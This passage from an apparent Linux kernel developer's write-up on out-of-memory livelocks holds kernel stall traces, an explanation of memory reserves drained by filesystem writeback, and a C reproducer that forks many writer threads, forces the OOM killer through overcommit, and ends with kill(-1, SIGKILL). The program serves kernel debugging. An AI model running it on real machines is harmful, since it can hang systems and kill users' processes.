[ 1208.272890] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=1048576kB
[ 1208.272892] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[ 1208.272893] 4329 total pagecache pages
[ 1208.272894] 0 pages in swap cache
[ 1208.272895] Swap cache stats: add 0, delete 0, find 0/0
[ 1208.272895] Free swap  = 0kB
[ 1208.272895] Total swap = 0kB
[ 1208.272897] 262013 pages RAM
[ 1208.272897] 0 pages HighMem/MovableOnly
[ 1208.272898] 12770 pages reserved
[ 1208.272898] 0 pages cma reserved
[ 1208.272898] 0 pages hwpoisoned
[ 1208.272899] Showing busy workqueues and worker pools:
[ 1208.272972] workqueue events_power_efficient: flags=0x80
[ 1208.273012]   pwq 0: cpus=0 node=0 flags=0x0 nice=0 active=1/256
[ 1208.273018]     in-flight: 4340:fb_flashcursor
[ 1208.273030] workqueue events_freezable_power_: flags=0x84
[ 1208.273058]   pwq 4: cpus=2 node=0 flags=0x0 nice=0 active=1/256
[ 1208.273063]     in-flight: 4484:disk_events_workfn
[ 1208.273104] workqueue writeback: flags=0x4e
[ 1208.273106]   pwq 128: cpus=0-63 flags=0x4 nice=0 active=2/256
[ 1208.273111]     in-flight: 73:wb_workfn wb_workfn
[ 1208.306156] workqueue xfs-eofblocks/sda1: flags=0xc
[ 1208.306191]   pwq 4: cpus=2 node=0 flags=0x0 nice=0 active=1/256
[ 1208.306211]     in-flight: 2125:xfs_eofblocks_worker [xfs]
[ 1208.306229] pool 0: cpus=0 node=0 flags=0x0 nice=0 hung=0s workers=13 idle: 4426 2410 4325 4483 4437 4723 4326 2389 4721 4435 4720 2498
[ 1208.306236] pool 4: cpus=2 node=0 flags=0x0 nice=0 hung=0s workers=13 idle: 1882 2396 2156 4427 2483 2293 4718 4646 2516 4722 4719
[ 1208.306302] pool 128: cpus=0-63 flags=0x4 nice=0 hung=0s workers=3 idle: 4706 6
(...snipped...)
[ 1208.311522] MemAlloc-Info: stalling=112 dying=3 exiting=3 victim=0 oom_count=3275
(...snipped...)
[ 1950.054919] MemAlloc-Info: stalling=114 dying=3 exiting=3 victim=0 oom_count=3275
[ 1950.078012] MemAlloc: systemd(1) flags=0x400900 switches=165614 seq=5087 gfp=0x242134a(GFP_NOFS|__GFP_HIGHMEM|__GFP_COLD|__GFP_NOWARN|__GFP_NORETRY|__GFP_HARDWALL|__GFP_MOVABLE) order=0 delay=830398 uninterruptible
[ 1950.111605] systemd         R  running task        0     1      0 0x00000000
[ 1950.122076]  ffff88003faef5b8 0000000100192d5b ffff88003a544100 ffff88003fae8040
[ 1950.128056]  ffff88003faf0000 ffff88003faef5f0 ffff88003d6d0300 0000000100192d5b
[ 1950.133668]  0000000000000002 ffff88003faef5d0 ffffffff81621dea ffff88003d6d0300
[ 1950.139115] Call Trace:
[ 1950.141436]  [<ffffffff81621dea>] schedule+0x3a/0x90
[ 1950.145228]  [<ffffffff8162667e>] schedule_timeout+0x11e/0x1c0
[ 1950.149574]  [<ffffffff810e4ba0>] ? init_timer_key+0x40/0x40
[ 1950.153772]  [<ffffffff8112f24a>] ? __delayacct_blkio_start+0x1a/0x30
[ 1950.158432]  [<ffffffff81621571>] io_schedule_timeout+0xa1/0x110
[ 1950.162841]  [<ffffffff8116ba5d>] congestion_wait+0x7d/0xd0
[ 1950.166950]  [<ffffffff810baaa0>] ? wait_woken+0x80/0x80
[ 1950.170994]  [<ffffffff811605e1>] shrink_inactive_list+0x441/0x490
[ 1950.175841]  [<ffffffff8100301a>] ? trace_hardirqs_on_thunk+0x1a/0x1c
[ 1950.180556]  [<ffffffff81160fad>] shrink_zone_memcg+0x5ad/0x740
[ 1950.185904]  [<ffffffff81161214>] shrink_zone+0xd4/0x2f0
[ 1950.190358]  [<ffffffff811617aa>] do_try_to_free_pages+0x17a/0x400
[ 1950.194978]  [<ffffffff81161ac4>] try_to_free_pages+0x94/0xc0
[ 1950.201233]  [<ffffffff81153c1c>] __alloc_pages_nodemask+0x69c/0xf70
[ 1950.206097]  [<ffffffff810c1a9b>] ? __lock_acquire+0x75b/0x1a30
[ 1950.210494]  [<ffffffff8119e8c6>] alloc_pages_current+0x96/0x1b0
[ 1950.215278]  [<ffffffff8114933d>] __page_cache_alloc+0x12d/0x160
[ 1950.219628]  [<ffffffff81159d6e>] __do_page_cache_readahead+0x10e/0x370
[ 1950.224302]  [<ffffffff81159dd0>] ? __do_page_cache_readahead+0x170/0x370
[ 1950.229148]  [<ffffffff81149cb7>] ? pagecache_get_page+0x27/0x260
[ 1950.233503]  [<ffffffff8114ce1b>] filemap_fault+0x31b/0x670
[ 1950.237520]  [<ffffffffa0251d00>] ? xfs_ilock+0xd0/0xe0 [xfs]
[ 1950.241643]  [<ffffffffa0245be9>] xfs_filemap_fault+0x39/0x60 [xfs]
[ 1950.246027]  [<ffffffff81176e71>] __do_fault+0x71/0x140
[ 1950.249784]  [<ffffffff8117d53c>] handle_mm_fault+0x12ec/0x1f30
[ 1950.253974]  [<ffffffff8105c865>] ? __do_page_fault+0x1b5/0x560
[ 1950.259159]  [<ffffffff8105c7b2>] ? __do_page_fault+0x102/0x560
[ 1950.264641]  [<ffffffff8105c840>] __do_page_fault+0x190/0x560
[ 1950.269192]  [<ffffffff8105cc40>] do_page_fault+0x30/0x80
[ 1950.273736]  [<ffffffff81629278>] page_fault+0x28/0x30
[ 1950.278475] MemAlloc: khugepaged(47) flags=0x200840 switches=8965 seq=9 gfp=0xc752ca(GFP_TRANSHUGE|__GFP_THISNODE|__GFP_DIRECT_RECLAIM|__GFP_OTHER_NODE) order=9 delay=762178 uninterruptible
[ 1950.291797] khugepaged      D ffff88003cf537a8     0    47      2 0x00000000
[ 1950.298253]  ffff88003cf537a8 0000000100192dbf ffff88003fae8040 ffff88003cf3c000
[ 1950.304204]  ffff88003cf54000 ffff88003cf537e0 ffff88003d6d0300 0000000100192dbf
[ 1950.310046]  0000000000000002 ffff88003cf537c0 ffffffff81621dea ffff88003d6d0300
[ 1950.317795] Call Trace:
[ 1950.320089]  [<ffffffff81621dea>] schedule+0x3a/0x90
[ 1950.324003]  [<ffffffff8162667e>] schedule_timeout+0x11e/0x1c0
[ 1950.328400]  [<ffffffff810e4ba0>] ? init_timer_key+0x40/0x40
[ 1950.332449]  [<ffffffff8112f24a>] ? __delayacct_blkio_start+0x1a/0x30
[ 1950.337038]  [<ffffffff81621571>] io_schedule_timeout+0xa1/0x110
[ 1950.341332]  [<ffffffff8116ba5d>] congestion_wait+0x7d/0xd0
[ 1950.345834]  [<ffffffff810baaa0>] ? wait_woken+0x80/0x80
[ 1950.351326]  [<ffffffff811605e1>] shrink_inactive_list+0x441/0x490
[ 1950.355756]  [<ffffffff81174355>] ? __list_lru_count_one.isra.4+0x45/0x80
[ 1950.360660]  [<ffffffff81160fad>] shrink_zone_memcg+0x5ad/0x740
[ 1950.366724]  [<ffffffff81161214>] shrink_zone+0xd4/0x2f0
[ 1950.370594]  [<ffffffff811617aa>] do_try_to_free_pages+0x17a/0x400
[ 1950.374968]  [<ffffffff81161ac4>] try_to_free_pages+0x94/0xc0
[ 1950.379637]  [<ffffffff81153c1c>] __alloc_pages_nodemask+0x69c/0xf70
[ 1950.384061]  [<ffffffff810ba578>] ? remove_wait_queue+0x48/0x50
[ 1950.388185]  [<ffffffff811af13e>] khugepaged+0x80e/0x1510
[ 1950.392291]  [<ffffffff810baaa0>] ? wait_woken+0x80/0x80
[ 1950.396425]  [<ffffffff811ae930>] ? vmf_insert_pfn_pmd+0x1b0/0x1b0
[ 1950.400908]  [<ffffffff81094d6e>] kthread+0xee/0x110
[ 1950.404637]  [<ffffffff8162796f>] ret_from_fork+0x1f/0x40
[ 1950.408407]  [<ffffffff81094c80>] ? kthread_create_on_node+0x230/0x230
[ 1950.412879] MemAlloc: kswapd0(56) flags=0xa60840 switches=69433 uninterruptible
[ 1950.419403] kswapd0         D ffff880039fa7178     0    56      2 0x00000000
[ 1950.424425]  ffff880039fa7178 0000000000000006 ffffffff81c0d540 ffff880039fa0100
[ 1950.430782]  ffff880039fa8000 ffff880037de7070 ffff880039fa0100 ffff880035d00000
[ 1950.436007]  0000000000000000 ffff880039fa7190 ffffffff81621dea 7fffffffffffffff
[ 1950.441198] Call Trace:
[ 1950.443203]  [<ffffffff81621dea>] schedule+0x3a/0x90
[ 1950.447880]  [<ffffffff816266df>] schedule_timeout+0x17f/0x1c0
[ 1950.452830]  [<ffffffff810c0dd6>] ? mark_held_locks+0x66/0x90
[ 1950.456988]  [<ffffffff81626ea7>] ? _raw_spin_unlock_irq+0x27/0x60
[ 1950.461570]  [<ffffffff810c0ef9>] ? trace_hardirqs_on_caller+0xf9/0x1c0
[ 1950.466355]  [<ffffffff816253fb>] __down+0x71/0xb8
[ 1950.469801]  [<ffffffff810bcf1c>] down+0x3c/0x50
[ 1950.473158]  [<ffffffffa02425e1>] xfs_buf_lock+0x21/0x50 [xfs]
[ 1950.477591]  [<ffffffffa02427c5>] _xfs_buf_find+0x1b5/0x2e0 [xfs]
[ 1950.482185]  [<ffffffffa0242915>] xfs_buf_get_map+0x25/0x160 [xfs]
[ 1950.486506]  [<ffffffffa0242ee9>] xfs_buf_read_map+0x29/0xe0 [xfs]
[ 1950.490796]  [<ffffffffa026d837>] xfs_trans_read_buf_map+0x97/0x1a0 [xfs]
[ 1950.495584]  [<ffffffffa020ad95>] xfs_read_agf+0x75/0xb0 [xfs]
[ 1950.499804]  [<ffffffffa020adf6>] xfs_alloc_read_agf+0x26/0xd0 [xfs]
[ 1950.504170]  [<ffffffffa020b1c5>] xfs_alloc_fix_freelist+0x325/0x3e0 [xfs]
[ 1950.508832]  [<ffffffffa0239752>] ? xfs_perag_get+0x82/0x110 [xfs]
[ 1950.513079]  [<ffffffff812dd76e>] ? __radix_tree_lookup+0x6e/0xd0
[ 1950.517235]  [<ffffffffa020b47e>] xfs_alloc_vextent+0x19e/0x480 [xfs]
[ 1950.521686]  [<ffffffffa02190cf>] xfs_bmap_btalloc+0x3bf/0x710 [xfs]
[ 1950.526006]  [<ffffffffa0219429>] xfs_bmap_alloc+0x9/0x10 [xfs]
[ 1950.530096]  [<ffffffffa0219e1a>] xfs_bmapi_write+0x47a/0xa10 [xfs]
[ 1950.534389]  [<ffffffffa024f3fd>] xfs_iomap_write_allocate+0x16d/0x350 [xfs]
[ 1950.539174]  [<ffffffffa023c4ed>] xfs_map_blocks+0x13d/0x150 [xfs]
[ 1950.543411]  [<ffffffffa023d468>] xfs_do_writepage+0x158/0x540 [xfs]
[ 1950.547712]  [<ffffffffa023d886>] xfs_vm_writepage+0x36/0x70 [xfs]
[ 1950.552184]  [<ffffffff8115e1df>] pageout.isra.43+0x18f/0x240
[ 1950.556493]  [<ffffffff8115fa85>] shrink_page_list+0x725/0x950
[ 1950.560540]  [<ffffffff811603a5>] shrink_inactive_list+0x205/0x490
[ 1950.564864]  [<ffffffff81160fad>] shrink_zone_memcg+0x5ad/0x740
[ 1950.569394]  [<ffffffff81161214>] shrink_zone+0xd4/0x2f0
[ 1950.573071]  [<ffffffff81162165>] kswapd+0x445/0x830
[ 1950.576627]  [<ffffffff81161d20>] ? mem_cgroup_shrink_node_zone+0xb0/0xb0
[ 1950.581585]  [<ffffffff81094d6e>] kthread+0xee/0x110
[ 1950.585080]  [<ffffffff8162796f>] ret_from_fork+0x1f/0x40
[ 1950.588837]  [<ffffffff81094c80>] ? kthread_create_on_node+0x230/0x230
(...snipped...)
[ 1964.314371] MemAlloc: kworker/2:1(4484) flags=0x4208860 switches=48311 seq=15 gfp=0x2400000(GFP_NOIO) order=0 delay=838842 uninterruptible
[ 1964.314373] kworker/2:1     D ffff88002d50b548     0  4484      2 0x00000080
[ 1964.314377] Workqueue: events_freezable_power_ disk_events_workfn
[ 1964.314378]  ffff88002d50b548 00000001001964d1 ffff88002a518100 ffff88002d5040c0
[ 1964.314379]  ffff88002d50c000 ffff88002d50b580 ffff88003d690300 00000001001964d1
[ 1964.314380]  0000000000000002 ffff88002d50b560 ffffffff81621dea ffff88003d690300
[ 1964.314380] Call Trace:
[ 1964.314382]  [<ffffffff81621dea>] schedule+0x3a/0x90
[ 1964.314383]  [<ffffffff8162667e>] schedule_timeout+0x11e/0x1c0
[ 1964.314384]  [<ffffffff810e4ba0>] ? init_timer_key+0x40/0x40
[ 1964.314385]  [<ffffffff8112f24a>] ? __delayacct_blkio_start+0x1a/0x30
[ 1964.314386]  [<ffffffff81621571>] io_schedule_timeout+0xa1/0x110
[ 1964.314387]  [<ffffffff8116ba5d>] congestion_wait+0x7d/0xd0
[ 1964.314389]  [<ffffffff810baaa0>] ? wait_woken+0x80/0x80
[ 1964.314390]  [<ffffffff811605e1>] shrink_inactive_list+0x441/0x490
[ 1964.314391]  [<ffffffff81174355>] ? __list_lru_count_one.isra.4+0x45/0x80
[ 1964.314392]  [<ffffffff81160fad>] shrink_zone_memcg+0x5ad/0x740
[ 1964.314393]  [<ffffffff81161214>] shrink_zone+0xd4/0x2f0
[ 1964.314394]  [<ffffffff811617aa>] do_try_to_free_pages+0x17a/0x400
[ 1964.314395]  [<ffffffff81161ac4>] try_to_free_pages+0x94/0xc0
[ 1964.314396]  [<ffffffff81153c1c>] __alloc_pages_nodemask+0x69c/0xf70
[ 1964.314397]  [<ffffffff810c0dd6>] ? mark_held_locks+0x66/0x90
[ 1964.314400]  [<ffffffff811a6029>] ? kmem_cache_alloc_node+0x99/0x1d0
[ 1964.314402]  [<ffffffff8119e8c6>] alloc_pages_current+0x96/0x1b0
[ 1964.314404]  [<ffffffff812a3b2d>] ? bio_alloc_bioset+0x20d/0x2d0
[ 1964.314404]  [<ffffffff812a4f14>] bio_copy_kern+0xc4/0x180
[ 1964.314405]  [<ffffffff812aff00>] blk_rq_map_kern+0x70/0x130
[ 1964.314407]  [<ffffffff8140f2ad>] scsi_execute+0x12d/0x160
[ 1964.314408]  [<ffffffff8140f3d4>] scsi_execute_req_flags+0x84/0xf0
[ 1964.314412]  [<ffffffffa01e0762>] sr_check_events+0xb2/0x2a0 [sr_mod]
[ 1964.314414]  [<ffffffffa01d4163>] cdrom_check_events+0x13/0x30 [cdrom]
[ 1964.314415]  [<ffffffffa01e0ba5>] sr_block_check_events+0x25/0x30 [sr_mod]
[ 1964.314417]  [<ffffffff812bb6db>] disk_check_events+0x5b/0x150
[ 1964.314418]  [<ffffffff812bb7e7>] disk_events_workfn+0x17/0x20
[ 1964.314420]  [<ffffffff8108e2f5>] process_one_work+0x1a5/0x400
[ 1964.314421]  [<ffffffff8108e291>] ? process_one_work+0x141/0x400
[ 1964.314422]  [<ffffffff8108e676>] worker_thread+0x126/0x490
[ 1964.314424]  [<ffffffff8108e550>] ? process_one_work+0x400/0x400
[ 1964.314433]  [<ffffffff81094d6e>] kthread+0xee/0x110
[ 1964.314435]  [<ffffffff8162796f>] ret_from_fork+0x1f/0x40
[ 1964.314436]  [<ffffffff81094c80>] ? kthread_create_on_node+0x230/0x230
[ 1964.314503] Mem-Info:
[ 1964.314507] active_anon:197951 inactive_anon:2919 isolated_anon:0
[ 1964.314507]  active_file:585 inactive_file:1081 isolated_file:23
[ 1964.314507]  unevictable:0 dirty:0 writeback:204 unstable:0
[ 1964.314507]  slab_reclaimable:1715 slab_unreclaimable:10724
[ 1964.314507]  mapped:1114 shmem:3239 pagetables:5438 bounce:0
[ 1964.314507]  free:12237 free_pcp:73 free_cma:0
[ 1964.314512] Node 0 DMA free:4580kB min:732kB low:912kB high:1092kB active_anon:8600kB inactive_anon:0kB active_file:12kB inactive_file:20kB unevictable:0kB isolated(anon):0kB isolated(file):92kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:28kB mapped:12kB shmem:8kB slab_reclaimable:148kB slab_unreclaimable:716kB kernel_stack:368kB pagetables:524kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[ 1964.314514] lowmem_reserve[]: 0 936 936 936
[ 1964.314518] Node 0 DMA32 free:44368kB min:44320kB low:55400kB high:66480kB active_anon:783204kB inactive_anon:11676kB active_file:2328kB inactive_file:4304kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:1032064kB managed:981068kB mlocked:0kB dirty:0kB writeback:788kB mapped:4444kB shmem:12948kB slab_reclaimable:6712kB slab_unreclaimable:42180kB kernel_stack:19552kB pagetables:21228kB unstable:0kB bounce:0kB free_pcp:292kB local_pcp:36kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[ 1964.314519] lowmem_reserve[]: 0 0 0 0
[ 1964.314526] Node 0 DMA: 37*4kB (U) 30*8kB (UM) 18*16kB (UM) 10*32kB (U) 2*64kB (UM) 3*128kB (UM) 4*256kB (UM) 2*512kB (UM) 1*1024kB (U) 0*2048kB 0*4096kB = 4580kB
[ 1964.314530] Node 0 DMA32: 1384*4kB (UE) 1000*8kB (UE) 669*16kB (UME) 335*32kB (UME) 113*64kB (UME) 17*128kB (UME) 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 44368kB
[ 1964.314532] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=1048576kB
[ 1964.314532] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[ 1964.314533] 4943 total pagecache pages
[ 1964.314534] 0 pages in swap cache
[ 1964.314535] Swap cache stats: add 0, delete 0, find 0/0
[ 1964.314535] Free swap  = 0kB
[ 1964.314536] Total swap = 0kB
[ 1964.314547] 262013 pages RAM
[ 1964.314547] 0 pages HighMem/MovableOnly
[ 1964.314548] 12770 pages reserved
[ 1964.314548] 0 pages cma reserved
[ 1964.314548] 0 pages hwpoisoned
[ 1964.314549] Showing busy workqueues and worker pools:
[ 1964.314572] workqueue events: flags=0x0
[ 1964.314617]   pwq 4: cpus=2 node=0 flags=0x0 nice=0 active=1/256
[ 1964.314634]     pending: vmw_fb_dirty_flush [vmwgfx]
[ 1964.314673] workqueue events_power_efficient: flags=0x80
[ 1964.314703]   pwq 4: cpus=2 node=0 flags=0x0 nice=0 active=1/256
[ 1964.314706]     in-flight: 1882:fb_flashcursor
[ 1964.314725] workqueue events_freezable_power_: flags=0x84
[ 1964.314744]   pwq 4: cpus=2 node=0 flags=0x0 nice=0 active=1/256
[ 1964.314748]     in-flight: 4484:disk_events_workfn
[ 1964.314794] workqueue writeback: flags=0x4e
[ 1964.314796]   pwq 128: cpus=0-63 flags=0x4 nice=0 active=2/256
[ 1964.314799]     in-flight: 73:wb_workfn wb_workfn
[ 1964.315291] workqueue xfs-eofblocks/sda1: flags=0xc
[ 1964.315314]   pwq 4: cpus=2 node=0 flags=0x0 nice=0 active=1/256
[ 1964.315322]     in-flight: 2125:xfs_eofblocks_worker [xfs]
[ 1964.315336] pool 4: cpus=2 node=0 flags=0x0 nice=0 hung=0s workers=4 idle: 2396
[ 1964.315395] pool 128: cpus=0-63 flags=0x4 nice=0 hung=0s workers=3 idle: 4706 6
(...snipped...)
[ 1964.320659] MemAlloc-Info: stalling=114 dying=3 exiting=3 victim=0 oom_count=3275
---------- Example output end ----------

Above output has messages from kmallocwd kernel thread. But since currently kmallocwd is not yet accepted, no messages will be printed when a system actually hit this situation (unless both /proc/sys/kernel/hung_task_timeout_secs and /proc/sys/kernel/hung_task_warnings are set to non-zero values).

I haven't got response about this problem from Michal Hocko, for Michal Hocko is too busy with OOM killer / OOM reaper related fixes. I asked when we will be able to start handling this problem, but since this problem has deep roots, it is difficult to answer estimated time.

March 2016  Memory depletion due to fs writeback operations under OOM situation

Allocation requests for making free memory are allowed to allocate from memory reserves. Therefore, not only threads with TIF_MEMDIE flag set but also threads doing fs writeback operation can allocate from memory reserves. But since there is no means to limit amount of memory allocated from memory reserves, casually allocating from memory reserves results in depletion of memory reserves. As a result, when examining behavior of OOM situation, some behavior which is no problem under normal situation makes the situation worse under OOM situation.

This is an example that memory reserves are depleted due to memory allocation requests for fs writeback operation which occurs via normal memory allocation if OOM livelock situation occurs while writing to a file.

---------- oom-tester16.c ----------
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/prctl.h>
#include <signal.h>

static char buffer[4096] = { };

static int file_io(void *unused)
{
        const int fd = open(buffer, O_WRONLY | O_CREAT | O_APPEND, 0600);
        sleep(2);
        while (write(fd, buffer, sizeof(buffer)) > 0);
        close(fd);
        return 0;
}

int main(int argc, char *argv[])
{
        int i;
        if (chdir("/tmp"))
                return 1;
        for (i = 0; i < 64; i++)
                if (fork() == 0) {
                        static cpu_set_t set = { { 1 } };
                        const int fd = open("/proc/self/oom_score_adj", O_WRONLY);
                        write(fd, "1000", 4);
                        close(fd);
                        sched_setaffinity(0, sizeof(set), &set);
                        snprintf(buffer, sizeof(buffer), "file_io.%02u", i);
                        prctl(PR_SET_NAME, (unsigned long) buffer, 0, 0, 0);
                        for (i = 0; i < 16; i++)
                                clone(file_io, malloc(1024) + 1024, CLONE_VM, NULL);
                        while (1)
                                pause();
                }
        { /* A dummy process for invoking the OOM killer. */
                char *buf = NULL;
                unsigned long i;
                unsigned long size = 0;
                prctl(PR_SET_NAME, (unsigned long) "memeater", 0, 0, 0);
                for (size = 1048576; size < 512UL * (1 << 30); size <<= 1) {
                        char *cp = realloc(buf, size);
                        if (!cp) {
                                size >>= 1;
                                break;
                        }
                        buf = cp;
                }
                sleep(4);
                for (i = 0; i < size; i += 4096)
                        buf[i] = '\0'; /* Will cause OOM due to overcommit */
        }
        kill(-1, SIGKILL);
        return * (char *) NULL; /* Not reached. */
}
---------- oom-tester16.c ----------
---------- Example output start ----------
[   59.562581] Mem-Info:
[   59.563935] active_anon:289393 inactive_anon:2093 isolated_anon:29
[   59.563935]  active_file:10838 inactive_file:113013 isolated_file:859
[   59.563935]  unevictable:0 dirty:108531 writeback:5308 unstable:0
[   59.563935]  slab_reclaimable:5526 slab_unreclaimable:7077
[   59.563935]  mapped:9970 shmem:2159 pagetables:2387 bounce:0
[   59.563935]  free:3042 free_pcp:0 free_cma:0
[   59.574558] Node 0 DMA free:6968kB min:44kB low:52kB high:64kB active_anon:6056kB inactive_anon:176kB active_file:712kB inactive_file:744kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:756kB writeback:0kB mapped:736kB shmem:184kB slab_reclaimable:48kB slab_unreclaimable:208kB kernel_stack:160kB pagetables:144kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:9708 all_unreclaimable? yes
[   59.585464] lowmem_reserve[]: 0 1732 1732 1732
[   59.587123] Node 0 DMA32 free:5200kB min:5200kB low:6500kB high:7800kB active_anon:1151516kB inactive_anon:8196kB active_file:42640kB inactive_file:451076kB unevictable:0kB isolated(anon):116kB isolated(file):3564kB present:2080640kB managed:1775332kB mlocked:0kB dirty:433368kB writeback:21232kB mapped:39144kB shmem:8452kB slab_reclaimable:22056kB slab_unreclaimable:28100kB kernel_stack:20976kB pagetables:9404kB unstable:0kB bounce:0kB free_pcp:120kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:2701604 all_unreclaimable? no
[   59.599649] lowmem_reserve[]: 0 0 0 0
[   59.601431] Node 0 DMA: 25*4kB (UME) 16*8kB (UME) 3*16kB (UE) 5*32kB (UME) 2*64kB (UM) 2*128kB (ME) 2*256kB (ME) 1*512kB (E) 1*1024kB (E) 2*2048kB (ME) 0*4096kB = 6964kB
[   59.606509] Node 0 DMA32: 925*4kB (UME) 140*8kB (UME) 5*16kB (ME) 5*32kB (M) 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 5060kB
[   59.610415] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=1048576kB
[   59.612879] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[   59.615308] 126847 total pagecache pages
[   59.616921] 0 pages in swap cache
[   59.618475] Swap cache stats: add 0, delete 0, find 0/0
[   59.620268] Free swap  = 0kB
[   59.621650] Total swap = 0kB
[   59.623011] 524157 pages RAM
[   59.624365] 0 pages HighMem/MovableOnly
[   59.625893] 76348 pages reserved
[   59.627506] 0 pages hwpoisoned
[   59.628838] Out of memory: Kill process 4450 (file_io.00) score 998 or sacrifice child
[   59.631071] Killed process 4450 (file_io.00) total-vm:4308kB, anon-rss:100kB, file-rss:1184kB, shmem-rss:0kB
[   61.526353] kthreadd: page allocation failure: order:0, mode:0x2200020
[   61.527976] file_io.00: page allocation failure: order:0, mode:0x2200020
[   61.527978] CPU: 0 PID: 4457 Comm: file_io.00 Not tainted 4.5.0-rc7+ #45
[   61.527979] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013
[   61.527981]  0000000000000086 000000000005bb2d ffff88006cc5b588 ffffffff812a4d65
[   61.527982]  0000000002200020 0000000000000000 ffff88006cc5b618 ffffffff81106dc7
[   61.527983]  0000000000000000 ffffffffffffffff 00ff880000000000 ffff880000000004
[   61.527983] Call Trace:
[   61.528009]  [<ffffffff812a4d65>] dump_stack+0x4d/0x68
[   61.528012]  [<ffffffff81106dc7>] warn_alloc_failed+0xf7/0x150
[   61.528014]  [<ffffffff81109e3f>] __alloc_pages_nodemask+0x23f/0xa60
[   61.528016]  [<ffffffff81137770>] ? page_check_address_transhuge+0x350/0x350
[   61.528018]  [<ffffffff8111327d>] ? page_evictable+0xd/0x40
[   61.528019]  [<ffffffff8114d927>] alloc_pages_current+0x87/0x110
[   61.528021]  [<ffffffff81155181>] new_slab+0x3a1/0x440
[   61.528023]  [<ffffffff81156fdf>] ___slab_alloc+0x3cf/0x590
[   61.528024]  [<ffffffff811a0999>] ? wb_start_writeback+0x39/0x90
[   61.528027]  [<ffffffff815a7f68>] ? preempt_schedule_common+0x1f/0x37
[   61.528028]  [<ffffffff815a7f9f>] ? preempt_schedule+0x1f/0x30
[   61.528030]  [<ffffffff81001012>] ? ___preempt_schedule+0x12/0x14
[   61.528030]  [<ffffffff811a0999>] ? wb_start_writeback+0x39/0x90
[   61.528032]  [<ffffffff81175536>] __slab_alloc.isra.64+0x18/0x1d
[   61.528033]  [<ffffffff8115778c>] kmem_cache_alloc+0x11c/0x150
[   61.528034]  [<ffffffff811a0999>] wb_start_writeback+0x39/0x90
[   61.528035]  [<ffffffff811a0d9f>] wakeup_flusher_threads+0x7f/0xf0
[   61.528036]  [<ffffffff81115ac9>] do_try_to_free_pages+0x1f9/0x410
[   61.528037]  [<ffffffff81115d74>] try_to_free_pages+0x94/0xc0
[   61.528038]  [<ffffffff8110a166>] __alloc_pages_nodemask+0x566/0xa60
[   61.528040]  [<ffffffff81200878>] ? xfs_bmapi_read+0x208/0x2f0
[   61.528041]  [<ffffffff8114d927>] alloc_pages_current+0x87/0x110
[   61.528042]  [<ffffffff8110092f>] __page_cache_alloc+0xaf/0xc0
[   61.528043]  [<ffffffff811011e8>] pagecache_get_page+0x88/0x260
[   61.528044]  [<ffffffff81101d31>] grab_cache_page_write_begin+0x21/0x40
[   61.528046]  [<ffffffff81222c9f>] xfs_vm_write_begin+0x2f/0xf0
[   61.528047]  [<ffffffff810b14be>] ? current_fs_time+0x1e/0x30
[   61.528048]  [<ffffffff81101eca>] generic_perform_write+0xca/0x1c0
[   61.528050]  [<ffffffff8107c390>] ? wake_up_process+0x10/0x20
[   61.528051]  [<ffffffff8122e01c>] xfs_file_buffered_aio_write+0xcc/0x1f0
[   61.528052]  [<ffffffff81079037>] ? finish_task_switch+0x77/0x280
[   61.528053]  [<ffffffff8122e1c4>] xfs_file_write_iter+0x84/0x140
[   61.528054]  [<ffffffff811777a7>] __vfs_write+0xc7/0x100
[   61.528055]  [<ffffffff811784cd>] vfs_write+0x9d/0x190
[   61.528056]  [<ffffffff810010a1>] ? do_audit_syscall_entry+0x61/0x70
[   61.528057]  [<ffffffff811793c0>] SyS_write+0x50/0xc0
[   61.528059]  [<ffffffff815ab4d7>] entry_SYSCALL_64_fastpath+0x12/0x6a
[   61.528059] Mem-Info:
[   61.528062] active_anon:293335 inactive_anon:2093 isolated_anon:0
[   61.528062]  active_file:10829 inactive_file:110045 isolated_file:32
[   61.528062]  unevictable:0 dirty:109275 writeback:822 unstable:0
[   61.528062]  slab_reclaimable:5489 slab_unreclaimable:10070
[   61.528062]  mapped:9999 shmem:2159 pagetables:2420 bounce:0
[   61.528062]  free:3 free_pcp:0 free_cma:0
[   61.528065] Node 0 DMA free:12kB min:44kB low:52kB high:64kB active_anon:6060kB inactive_anon:176kB active_file:708kB inactive_file:756kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:756kB writeback:0kB mapped:736kB shmem:184kB slab_reclaimable:48kB slab_unreclaimable:7160kB kernel_stack:160kB pagetables:144kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:9844 all_unreclaimable? yes
[   61.528066] lowmem_reserve[]: 0 1732 1732 1732
